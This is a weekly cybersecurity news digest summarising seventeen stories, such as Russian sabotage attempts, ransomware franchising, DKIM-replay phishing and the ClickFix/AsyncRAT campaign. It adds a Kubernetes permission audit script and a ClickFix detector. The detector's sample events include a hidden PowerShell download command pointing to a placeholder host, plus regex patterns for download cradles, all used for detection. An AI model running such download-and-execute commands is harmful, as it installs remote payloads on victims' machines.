We scour more than 15 cybersecurity news portals every week to surface only the stories worth your attention. This week was a busy one — from Russia’s foiled cyber-sabotage in the Netherlands to Google’s surprise U-turn on third-party-cookie prompts and rollout of IP Protection.
1. Russia Attempting Cyber Sabotage Attacks Against Dutch Critical Infrastructure
Context: Dutch military intelligence (MIVD) says it thwarted the first confirmed Russian cyber‑sabotage attempt on a Dutch public service and uncovered a separate operation against critical infrastructure that appeared to be reconnaissance for future sabotage.
Key Details
- No disruption occurred; the public‑service target was not named. The second operation aimed to pre‑position inside OT networks that power ports and energy sites.
- Activity mirrors Moscow’s broader hybrid campaign against NATO logistics hubs.
Read more: https://therecord.media/dutch-mivd-report-russian-cyber-sabotage
2. British Retailer M&S Confirms Being Hit by ‘Cyber Incident’ Amid Store Delays
Context: Marks & Spencer disclosed a cyber‑attack that from 21 April 2025 disrupted Click‑and‑Collect and contactless payments nationwide. Although some systems were impacted and taken offline, the retailer kept trading, which makes this a good example of a system that is resilient to attacks.
Key Details
- Card terminals and some card systems failed intermittently, forcing staff to switch to manual checkout flows.
- External IR firms and the UK NCSC are assisting; no evidence yet of customer‑data compromise.
Next Steps
- If you process M&S loyalty data, enable credential‑stuffing monitoring.
Read more: https://therecord.media/british-retailer-MS-confirms-cyber-incident-store-delays
3. Ransomware Groups Test New Business Models to Hit More Victims, Increase Profits
Context: Secureworks observed DragonForce and Anubis rolling out franchise‑style RaaS (Ransomware as a Service) offerings after the LockBit takedown.
One-click locker builders, white-label leak-site hosting and even VOIP “pressure-call” services mean low-skill crooks can start extorting immediately, driving attacks toward SMBs.
Key Details
- Menu now includes encryption‑plus‑leak, leak‑only extortion, and pure access resale to other gangs.
- Revenue splits vary (e.g., 70/30 for encryption, 90/10 for raw access resale), broadening appeal to low‑skill crooks.
Next Steps
- Stress-test insurance & IR playbooks: confirm policies cover leak-only extortion and rehearse response plans that start with public-data disclosure, not decryption.
Read more: https://therecord.media/ransomware-groups-test-new-business-models-dragonforce-anubis
4. Beware of Video-Call Links That Are Attempts to Steal Microsoft 365 Access, Researchers Tell NGOs
Context: Russia‑linked actors lure Ukrainian NGOs to fake video‑call portals that harvest OAuth device‑code tokens, bypassing passwords and MFA.
Key Details
- Campaign active since Feb 2025; at least 22 civil‑society groups targeted.
Next Steps
- Disable or restrict Device Code flow to trusted IP ranges.
- Train staff: real invites never require signing in on unmanaged browsers.
Read more: https://therecord.media/russia-linked-phishing-microsoft365-ukraine-ngos
5. Two Top Cyber Officials Resign From CISA
Context: Senior advisers Bob Lord and Lauren Zabierek resigned, warning of possible staff cuts and policy slowdowns.
Key Details
- Both helped launch the Secure‑by‑Design initiative; continuity now uncertain.
- Departure comes amid a federal hiring freeze that has delayed JCDC workstreams.
Read more: https://therecord.media/two-top-cyber-officials-resign-from-cisa
6. New Payment-Card Scam Involves a Phone Call, Some Malware and a Personal Tap
Context: Cleafy researchers uncovered a scam in which attackers pose as your bank, talk you through installing a bogus “security” app, then persuade you to tap your contactless card to the phone—at which point Android malware “SuperCard X” skims the data in real time and empties the account.
Key Details
- Kill‑chain: SMS ➜ call‑centre ➜ sideloaded APK ➜ card tap ➜ instant drain.
- The malware is sold as a service on Telegram for about €1,200 a month, complete with dashboards for affiliates.
Next Steps
- Block sideloading via MDM; enforce Play Protect.
- Educate: banks never request card taps to phones.
Read more: https://therecord.media/new-payment-card-scam-involves-malware-tap
7. North Korean Operatives Use Deepfakes in IT Job Interviews
Context: Unit 42 shows DPRK IT workers using real‑time deepfakes to secure remote jobs and infiltrate networks.
Key Details
- Building a convincing synthetic identity takes ~70 minutes with free tools.
- One operator can interview repeatedly under different personas.
Next Steps
- Record interviews; watch for lip‑sync and lighting artifacts.
- Run document‑to‑face ID checks pre‑hire.
- Log applicant IPs/phone numbers to flag anonymizers.
Read more: https://www.darkreading.com/remote-workforce/north-korean-operatives-deepfakes-it-job-interviews
8. Kubernetes Pods Are Inheriting Too Many Permissions
Context: Dark Reading reports that default cloud‑provider IAM lets pods inherit node‑level rights, enabling lateral movement.
Key Details
- AKS, EKS, and GKE are all affected; attackers can escalate via over‑privileged service accounts.
Next Steps
- Enable GKE Workload Identity / EKS IRSA / AKS managed identities.
- Restrict RBAC; avoid wild‑card roles.
- Scan for pods running privileged or hostNetwork=true.
Read more: https://www.darkreading.com/cloud-security/kubernetes-pods-inheriting-permissions
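The last "Next Steps" item above can be automated. As an added example (not code from the article or from any of the cloud providers), the script below walks the JSON that `kubectl get pods -A -o json` returns and flags pods that run privileged containers, share the host network or PID namespace, or keep the namespace's default service account token automounted (the path by which node-level rights leak into a pod). The pod list is a constructed sample embedded so the script runs offline.

```python
import json

# Constructed sample in the shape of `kubectl get pods -A -o json` output.
SAMPLE_PODS = json.loads("""
{"items": [
  {"metadata": {"name": "web", "namespace": "shop"},
   "spec": {"serviceAccountName": "web-sa", "automountServiceAccountToken": false,
            "containers": [{"name": "app", "securityContext": {"privileged": false}}]}},
  {"metadata": {"name": "node-agent", "namespace": "ops"},
   "spec": {"hostNetwork": true, "hostPID": true,
            "containers": [{"name": "agent", "securityContext": {"privileged": true}}]}},
  {"metadata": {"name": "batch", "namespace": "shop"},
   "spec": {"containers": [{"name": "job"}]}}
]}
""")


def audit_pod(pod):
    """Return the list of risk findings for one pod object."""
    spec = pod.get("spec", {})
    findings = []
    if spec.get("hostNetwork"):
        findings.append("hostNetwork=true")
    if spec.get("hostPID"):
        findings.append("hostPID=true")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"privileged container {c['name']}")
    # Kubernetes defaults: serviceAccountName "default" and automount true.
    # Such a pod inherits whatever the default SA (and, without Workload
    # Identity / IRSA / managed identities, the node) is allowed to do.
    if (spec.get("serviceAccountName", "default") == "default"
            and spec.get("automountServiceAccountToken", True)):
        findings.append("default service account token automounted")
    return findings


def audit(pods_json):
    """Map 'namespace/name' -> findings for every pod with at least one."""
    report = {}
    for pod in pods_json["items"]:
        key = f"{pod['metadata']['namespace']}/{pod['metadata']['name']}"
        findings = audit_pod(pod)
        if findings:
            report[key] = findings
    return report


if __name__ == "__main__":
    for pod, issues in audit(SAMPLE_PODS).items():
        print(pod, "->", ", ".join(issues))
```

Feed it live data with `kubectl get pods -A -o json | python3 audit.py` after replacing `SAMPLE_PODS` with `json.load(sys.stdin)`.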
9. Android Phones Shipped With Pre-Downloaded Malware Targeting Crypto Wallets
Context: Dark Reading cites Doctor Web: budget Android phones ship with pre‑loaded malware that steals crypto by hijacking wallet addresses.
Key Details
- At least 300,000 devices sold in SE Asia carry the Trojan; it activates when popular wallet apps are installed.
Next Steps
- Advise staff to avoid off‑brand phones; use hardware wallets.
- Block registration of unknown OEM device IDs via MDM.
- Decommission affected phones, or re‑flash them with clean ROMs if you really need to keep using them.
Read more: https://www.darkreading.com/threat-intelligence/android-pre-downloaded-malware-crypto-wallets
10. CVE Program Budget Cuts Rattle Cybersecurity Sector
Context: A proposed 40 % budget cut nearly shut down the 25-year-old CVE Program on 16 April 2025. After a loud industry backlash, CISA signed an 11-month bridge contract with MITRE and endorsed a newly formed CVE Foundation to take the project independent.
Read more: https://www.darkreading.com/vulnerabilities-threats/cve-program-cuts-cyber-sector
11. WhatsApp’s New Advanced Chat Privacy Feature to Protect Sensitive Conversations
Context: WhatsApp now lets users lock specific chats behind an extra passcode and hides previews.
Key Details
- Rollout began 24 April 2025 on Android and iOS
Next Steps
- Note: screenshots remain possible
- Update WhatsApp
- Require the latest WhatsApp on BYOD via MDM if WhatsApp is used for business and carries internal or confidential data.
Read more: https://cybersecuritynews.com/whatsapp-advanced-chat-privacy-feature/
12. The Shadow‑AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools
Context: CyberArk survey: half of employees paste sensitive data into consumer AI tools without sign‑off.
Key Details
- 36 % admitted pasting source code; 26 % shared customer data.
- Only 22 % of orgs have formal AI‑usage policies.
Next Steps
- Draft an AI‑acceptable‑use policy; block risky domains. You can download a free, simple AI‑use policy from us here.
- Offer logged, sanctioned GPTs.
Read more: https://www.securityweek.com/the-shadow-ai-surge-study-finds-50-of-workers-use-unapproved-ai-tools/
13. Google Drops Cookie Prompt in Chrome, Adds IP Protection to Incognito
Context: Google killed the idea of a pop-up that would have asked every Chrome user to allow or block third-party cookies, but the wider cookie phase-out is only delayed (pending U.K. regulator approval), and Chrome will instead test **IP Protection**—a two-hop proxy relay (Google + Cloudflare) that hides Incognito users’ IP addresses from trackers—starting in Canary builds in May 2025, with stable release no earlier than July.
Key Details
- Decision comes after Google scrapped its new cookie-consent prompt and postponed broader cookie deprecation to avoid breaking ad-tech workflows.
- IP Protection masks users’ addresses via a double proxy run by Cloudflare and Google; enterprises can disable it and it is off by default in managed Chrome.
- Move helps satisfy EU Digital Markets Act privacy expectations without completely overhauling web-tracking economics.
Read more: https://thehackernews.com/2025/04/google-drops-cookie-prompt-in-chrome.html
14. Phishers Exploit Google Sites and DKIM Replay to Send Signed Emails, Steal Credentials
Context: Until Google closed the loophole on 22 Apr 2025, attackers were grabbing a *legitimate* Google-signed email, replaying the same DKIM signature on a doctored message, and pointing users to credential-harvest pages hosted on Sites.google.com—so every message looked 100 % authentic to mail filters.
Key Details
- How the trick works: the gang captures a real no-reply@google.com message, swaps out the body and From-name inside a Google OAuth app, then replays the signed headers; DKIM and DMARC still pass because the signature matches the original hash.
- Why it lands: security tools trust both the DKIM signature and the sites.google.com domain hosting the fake login page, so the mail bypasses most enterprise gateways.
- Who was hit: campaigns focused on finance teams and SaaS help-desk inboxes, aiming to reuse cloud creds in BEC and payroll-diversion fraud.
Read more: https://thehackernews.com/2025/04/phishers-exploit-google-sites-and-dkim.html
15. Gartner: 85 % of CEOs now view cybersecurity as a growth driver
Context: Gartner’s 2025 CEO & Senior Executive Survey (≈ 450 global leaders) shows cybersecurity has shifted from cost centre to strategic enabler of revenue expansion and new-market entry.
Key Details
- 85 % of CEOs say robust security is *critical for business growth* and competitive differentiation.
- Risk back on the agenda: “enterprise risk” returned to CEOs’ top-10 priorities for the first time since 2017, driven by cyber-threats and regulation.
- Leadership anxiety: 45 % admit they would not feel comfortable defending a breach to the media, highlighting reputational stakes.
- AI double-edge: executives see AI as both a growth lever and a source of new attack surface, increasing demand for mature security programs.
Next Steps
- Link security KPIs to growth metrics (faster product launches, quicker market entry) when pitching budgets.
- Rehearse breach-response messaging so leaders can confidently address incidents with press and regulators.
Read more: https://cybermagazine.com/news/gartner-85-see-cybersecurity-as-critical-for-growth
16. Cyberwar in Ukraine, Year 3: Fewer wipers, more stealthy OT recon
Context: CSO Online’s April-2025 report says Russian operators have shifted from headline-grabbing wiper attacks to quieter espionage and mapping of operational-technology (OT) networks as the conflict grinds on.
Key Details
- Ukrainian defenders are now seeing **many more intrusions aimed at stealing data and charting energy-grid and transport systems** than outright destructive malware.
- CERT-UA notes that while wipers still surface, *the bulk of 2024 activity* was credential-theft and OT reconnaissance.
- Ukrainian critical-infrastructure teams report improved resilience: faster backup restore times and segmented OT help limit impact when destructive code does appear.
Read more: https://www.csoonline.com/article/3965409/the-state-of-cyberwar-in-ukraine-and-how-cisos-can-help.html
17. Booking.com phishing uses fake CAPTCHA to sneak AsyncRAT into hotel networks
Context: A global “ClickFix” campaign is impersonating Booking.com reservations. Victims are shown a bogus CAPTCHA page that triggers a PowerShell one-liner, downloading an AutoIt-wrapped **AsyncRAT** payload and handing attackers remote control.
Key Details
- Social-engineering flow: phishing email → PDF/HTML link → fake CAPTCHA → hidden PowerShell download → `AutoIt.exe -r loader.au3` launches AsyncRAT.
Read more: https://hackread.com/booking-com-phishing-scam-fake-captcha-asyncrat/
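The process chain in the bullet above (hidden PowerShell download, then `AutoIt.exe -r loader.au3` spawned by that PowerShell) is what endpoint telemetry would record. As an added example (not from the article), the detector below runs those two checks over constructed process-creation events; the event field names (`pid`, `ppid`, `image`, `cmdline`) are an assumption standing in for whatever your log pipeline emits (e.g. Sysmon Event ID 1).

```python
import re

# Constructed events, not real telemetry. Paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4201, "ppid": 1180, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 6010, "ppid": 4201,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"Invoke-WebRequest "
                "https://example.invalid/x -OutFile $env:TEMP\\loader.au3\""},
    {"pid": 6044, "ppid": 6010,
     "image": r"C:\Users\u\AppData\Local\Temp\AutoIt.exe",
     "cmdline": "AutoIt.exe -r loader.au3"},
    {"pid": 7000, "ppid": 4201,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},  # benign
]

# Hidden window combined with a download cmdlet/alias in the same command.
HIDDEN_DOWNLOAD = re.compile(
    r"-w(indowstyle)?\s+hidden.*(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)",
    re.I)
# AutoIt interpreter asked to run a .au3 script.
AUTOIT_SCRIPT = re.compile(r"autoit3?\.exe.*\s-r\s+\S+\.au3", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix(events):
    """Return (pid, reason) tuples for events matching the ClickFix chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) == "powershell.exe" and HIDDEN_DOWNLOAD.search(e["cmdline"]):
            hits.append((e["pid"], "hidden PowerShell download cradle"))
        if AUTOIT_SCRIPT.search(e["cmdline"]):
            parent = basename(by_pid.get(e["ppid"], {}).get("image", ""))
            if parent in SCRIPT_HOSTS:
                hits.append((e["pid"], f"AutoIt script launched by {parent}"))
    return hits


if __name__ == "__main__":
    for pid, reason in detect_clickfix(SAMPLE_EVENTS):
        print(pid, reason)
```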